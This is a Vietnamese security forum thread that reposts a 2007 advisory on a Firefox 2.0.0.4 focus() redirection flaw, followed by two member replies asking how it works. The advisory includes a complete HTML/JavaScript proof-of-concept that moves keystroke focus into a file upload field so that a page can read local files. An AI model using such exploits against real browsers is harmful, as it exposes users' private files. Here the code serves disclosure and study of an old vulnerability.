banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits Mozilla Firefox focus() Redirection Vulnerability  XML
  [Announcement]   Mozilla Firefox focus() Redirection Vulnerability 05/07/2007 18:20:25 (+0700) | #1 | 69057
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
Mozilla Firefox focus() Redirection Vulnerability
------------------------------------------------------------------------


SUMMARY
A vulnerability in Mozilla Firefox allows the attacker to silently wwwect focus of selected key press events to an otherwise protected file upload form field. This is possible because of how onKeyDown event is handled, allowing the focus to be moved between the two. This enables the attacker to read arbitrary files on victim's system.

DETAILS
Vulnerable Systems:
* Mozilla Firefox version 2.0.0.4 and prior

Exploit:
Code:
<html>
<body>
<script>
function restore()
{
 
document.getElementById("text1").value=document.getElementById("file1").value;
 document.getElementById("text1").focus();
}

function doKeyDown()
{
 document.getElementById("label1").focus();
}
</script>

<input type="file" id="file1" name="file1" onkeydown="restore();" 
onkeyup="restore()" />
<label for="file1" id="label1" name="label1"></label>
<br>
<textarea name="text1" id="text1" onkeydown="doKeyDown()">
</textarea>
</body>
</html>


ADDITIONAL INFORMATION
The information has been provided by <mailto:hardwick.carl@gmail.com>
carl hardwick.
The original article can be found at:
http://yathong.googlepages.com/FirefoxFocusBug.html
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Mozilla Firefox focus() Redirection Vulnerability 05/07/2007 22:53:00 (+0700) | #2 | 69084
[Avatar]
minhquan1712
Member

[Minus]    0    [Plus]
Joined: 07/09/2006 16:17:25
Messages: 240
Offline
[Profile] [PM]
trang mà bro cho chỉ là cái hiện thực cái code exploit thoai chứ nó đâu nói gì thêm đâu. Hix, hơi khó hiểu , chắc fải tìm hiểu thêm wóa T_T
[Up] [Print Copy]
  [Question]   Mozilla Firefox focus() Redirection Vulnerability 05/07/2007 22:55:10 (+0700) | #3 | 69086
[Avatar]
minhquan1712
Member

[Minus]    0    [Plus]
Joined: 07/09/2006 16:17:25
Messages: 240
Offline
[Profile] [PM]
hình như cái text field ở dưới ghi lại được những gì cái text trên gõ thì fải???
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|